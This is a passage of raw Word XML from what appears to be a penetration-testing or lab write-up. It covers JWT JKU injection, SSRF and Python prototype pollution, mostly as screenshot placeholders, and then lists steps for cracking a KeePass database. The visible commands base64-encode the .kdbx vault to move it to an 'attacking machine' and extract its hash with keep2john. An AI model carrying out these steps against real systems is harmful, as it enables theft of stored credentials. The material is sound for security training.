        <w:t xml:space="preserve">3.4.3. </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">JWT JKU Injection</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000026A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="14"/>
        </w:numPr>
        <w:spacing w:after="200" w:before="200" w:lineRule="auto"/>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Step 1 / 4:</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000026B">
      <w:pPr>
        <w:spacing w:after="200" w:lineRule="auto"/>
        <w:ind w:firstLine="720"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr/>
        <w:drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="4572000" cy="2653553"/>
            <wp:effectExtent b="12700" l="12700" r="12700" t="12700"/>
            <wp:docPr id="44" name="image51.png"/>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="image51.png"/>
                    <pic:cNvPicPr preferRelativeResize="0"/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId40"/>
                    <a:srcRect b="7611" l="0" r="12179" t="1215"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="4572000" cy="265355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C">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
        <w:spacing w:after="200" w:lineRule="auto"/>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Step 2 / 4:</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000026D">
      <w:pPr>
        <w:spacing w:after="200" w:before="200" w:lineRule="auto"/>
        <w:ind w:left="720" w:firstLine="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr/>
        <w:drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="3657600" cy="3836020"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="6"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3657600" cy="383602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200" w:before="200"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6F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="14"/>
        </w:numPr>
        <w:spacing w:after="200" w:before="200" w:lineRule="auto"/>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Step 3 / 4:</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000270">
      <w:pPr>
        <w:spacing w:after="200" w:lineRule="auto"/>
        <w:ind w:firstLine="720"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr/>
        <w:drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="4572000" cy="1497106"/>
            <wp:effectExtent b="12700" l="12700" r="12700" t="12700"/>
            <wp:docPr id="37" name="image44.png"/>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="image44.png"/>
                    <pic:cNvPicPr preferRelativeResize="0"/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId42"/>
                    <a:srcRect b="0" l="0" r="45299" t="0"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="4572000" cy="149710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1">
      <w:pPr>
        <w:spacing w:after="200" w:lineRule="auto"/>
        <w:ind w:firstLine="720"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr/>
        <w:drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="3200400" cy="672084"/>
            <wp:effectExtent b="12700" l="12700" r="12700" t="12700"/>
            <wp:docPr id="54" name="image54.png"/>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="image54.png"/>
                    <pic:cNvPicPr preferRelativeResize="0"/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId43"/>
                    <a:srcRect b="0" l="0" r="0" t="0"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="3200400" cy="67208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2">
      <w:pPr>
        <w:spacing w:after="200" w:lineRule="auto"/>
        <w:ind w:firstLine="720"/>
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr/>
        <w:drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="3200400" cy="1770888"/>
            <wp:effectExtent b="12700" l="12700" r="12700" t="12700"/>
            <wp:docPr id="11"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3200400" cy="17708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3">
      <w:pPr>
        <w:spacing w:after="200" w:before="200" w:lineRule="auto"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000027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b w:val="1"/>
          <w:bCs w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_sbcyq52myp9" w:id="57"/>
      <w:bookmarkEnd w:id="57"/>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color w:val="434343"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_4x56p72dzxdc" w:id="58"/>
      <w:bookmarkEnd w:id="58"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:color w:val="434343"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">3.5.2. </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="434343"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Server-Side Request Forgery (SSRF)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000276">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="14"/>
        </w:numPr>
        <w:spacing w:after="200" w:before="200" w:lineRule="auto"/>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Picture 1 / 2:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000277">
      <w:pPr>
        <w:spacing w:after="200" w:before="200" w:lineRule="auto"/>
        <w:ind w:left="0" w:firstLine="720"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr/>
        <w:drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="5029200" cy="3007462"/>
            <wp:effectExtent b="12700" l="12700" r="12700" t="12700"/>
            <wp:docPr id="30" name="image16.png"/>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="image16.png"/>
                    <pic:cNvPicPr preferRelativeResize="0"/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId45"/>
                    <a:srcRect b="41983" l="1093" r="4757" t="0"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5029200" cy="30074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8">
      <w:pPr>
        <w:ind w:firstLine="720"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr/>
        <w:drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="5029200" cy="2886323"/>
            <wp:effectExtent b="12700" l="12700" r="12700" t="12700"/>
            <wp:docPr id="55" name="image16.png"/>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="image16.png"/>
                    <pic:cNvPicPr preferRelativeResize="0"/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId45"/>
                    <a:srcRect b="0" l="0" r="29167" t="58182"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5029200" cy="288632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9">
      <w:pPr>
        <w:spacing w:after="200" w:before="200"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A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="14"/>
        </w:numPr>
        <w:spacing w:after="200" w:before="200" w:lineRule="auto"/>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Picture 2 / 2:</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000027B">
      <w:pPr>
        <w:ind w:firstLine="720"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr/>
        <w:drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="5029200" cy="3210951"/>
            <wp:effectExtent b="12700" l="12700" r="12700" t="12700"/>
            <wp:docPr id="8"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5029200" cy="321095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C">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3"/>
        <w:spacing w:after="200" w:before="200" w:lineRule="auto"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_d2v8nniozo5" w:id="59"/>
      <w:bookmarkEnd w:id="59"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">3.5.3. </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Python Prototype Pollution</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000027E">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="14"/>
        </w:numPr>
        <w:spacing w:after="200" w:before="200" w:lineRule="auto"/>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Picture 1 / 4:</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000027F">
      <w:pPr>
        <w:ind w:firstLine="720"/>
        <w:jc w:val="center"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr/>
        <w:drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="5943600" cy="1821692"/>
            <wp:effectExtent b="12700" l="12700" r="12700" t="12700"/>
            <wp:docPr id="46" name="image53.png"/>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="image53.png"/>
                    <pic:cNvPicPr preferRelativeResize="0"/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId47"/>
                    <a:srcRect b="3407" l="2082" r="2128" t="0"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5943600" cy="182169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0">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="14"/>
        </w:numPr>
        <w:spacing w:after="200" w:before="200" w:lineRule="auto"/>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Picture 2 / 4:</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000281">
      <w:pPr>
        <w:ind w:firstLine="720"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr/>
        <w:drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="2926080" cy="629551"/>
            <wp:effectExtent b="12700" l="12700" r="12700" t="12700"/>
            <wp:docPr id="3"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2926080" cy="62955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2">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="14"/>
        </w:numPr>
        <w:spacing w:after="200" w:before="200" w:lineRule="auto"/>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Picture 3 / 4:</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000283">
      <w:pPr>
        <w:spacing w:after="200" w:before="200" w:lineRule="auto"/>
        <w:ind w:left="0" w:firstLine="720"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr/>
        <w:drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="4389120" cy="3788975"/>
            <wp:effectExtent b="12700" l="12700" r="12700" t="12700"/>
            <wp:docPr id="25"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4389120" cy="37889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4">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="14"/>
        </w:numPr>
        <w:spacing w:after="200" w:before="200" w:lineRule="auto"/>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Picture 4 / 4:</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000285">
      <w:pPr>
        <w:ind w:firstLine="720"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr/>
        <w:drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="4389120" cy="2940710"/>
            <wp:effectExtent b="12700" l="12700" r="12700" t="12700"/>
            <wp:docPr id="50" name="image45.png"/>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="image45.png"/>
                    <pic:cNvPicPr preferRelativeResize="0"/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId50"/>
                    <a:srcRect b="0" l="0" r="0" t="0"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="4389120" cy="294071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6">
      <w:pPr>
        <w:spacing w:after="200" w:before="200" w:lineRule="auto"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000287">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:after="200" w:before="200" w:lineRule="auto"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_4u9107drppc4" w:id="60"/>
      <w:bookmarkEnd w:id="60"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">3.7. </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Cracking Keepass Database Master password and SSH Private Key</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000288">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="14"/>
        </w:numPr>
        <w:spacing w:after="200" w:before="200" w:lineRule="auto"/>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Step 1 / 9:</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="Table40"/>
        <w:tblW w:w="862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5"/>
        <w:tblGridChange w:id="0">
          <w:tblGrid>
            <w:gridCol w:w="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Source Code Pro" w:cs="Source Code Pro" w:eastAsia="Source Code Pro" w:hAnsi="Source Code Pro"/>
                <w:color w:val="ff0000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rFonts w:ascii="Source Code Pro" w:cs="Source Code Pro" w:eastAsia="Source Code Pro" w:hAnsi="Source Code Pro"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">cat secret.kdbx | base64 --encode</w:t>
            </w:r>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000028A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="14"/>
        </w:numPr>
        <w:spacing w:after="200" w:before="200" w:lineRule="auto"/>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Step 2 / 9:</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="Table41"/>
        <w:tblW w:w="861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10"/>
        <w:tblGridChange w:id="0">
          <w:tblGrid>
            <w:gridCol w:w="8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Source Code Pro" w:cs="Source Code Pro" w:eastAsia="Source Code Pro" w:hAnsi="Source Code Pro"/>
                <w:color w:val="ff0000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rFonts w:ascii="Source Code Pro" w:cs="Source Code Pro" w:eastAsia="Source Code Pro" w:hAnsi="Source Code Pro"/>
                <w:color w:val="0000ff"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve"># Do this in your attacking machine</w:t>
            </w:r>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rFonts w:ascii="Source Code Pro" w:cs="Source Code Pro" w:eastAsia="Source Code Pro" w:hAnsi="Source Code Pro"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:br w:type="textWrapping"/>
              <w:t xml:space="preserve">cat base64.txt | base64 --decode &gt; secret.kdbx</w:t>
            </w:r>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000028C">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="14"/>
        </w:numPr>
        <w:spacing w:after="200" w:before="200" w:lineRule="auto"/>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Step 3 / 9:</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="Table42"/>
        <w:tblW w:w="861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10"/>
        <w:tblGridChange w:id="0">
          <w:tblGrid>
            <w:gridCol w:w="8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Source Code Pro" w:cs="Source Code Pro" w:eastAsia="Source Code Pro" w:hAnsi="Source Code Pro"/>
                <w:color w:val="ff0000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rFonts w:ascii="Source Code Pro" w:cs="Source Code Pro" w:eastAsia="Source Code Pro" w:hAnsi="Source Code Pro"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">keep2john secret.kdbx &gt; keep2hash.txt</w:t>
            </w:r>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
